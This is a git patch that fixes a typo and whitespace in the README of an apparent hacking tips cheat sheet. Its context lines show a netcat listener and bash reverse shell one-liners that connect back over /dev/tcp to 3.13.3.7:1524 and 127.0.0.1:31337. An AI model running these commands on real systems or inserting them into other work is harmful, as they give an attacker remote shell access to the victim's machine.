From 495cb2c1f3b20a95ad016114b68f740cfbc2de26 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Thu, 15 Jun 2023 18:55:20 +0100 Subject: [PATCH] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1d6b90f..089550e 100644 --- a/README.md +++ b/README.md @@ -20,7 +20,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Almost invisible SSH](#ssh-invisible) 1. [SSH tunnel](#ssh-tunnel) 1. [SSH socks5 tunnel](#ssh-socks-tunnel) - 1. [SSH to NATed host](#ssh-j) + 1. [SSH to NATed host](#ssh-j) 1. [SSH pivot via ProxyJump](#ssh-pj) 1. [Network](#network) 1. [Discover hosts](#discover) @@ -912,7 +912,7 @@ nc -nvlp 1524 On the remote system, this command will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt: ```sh -# The the current shell is Bash already: +# If the current shell is Bash already: (bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) & # If the current shell is NOT Bash then we need: bash -c '(exec bash -i &>/dev/tcp/127.0.0.1/31337 0>&1) &'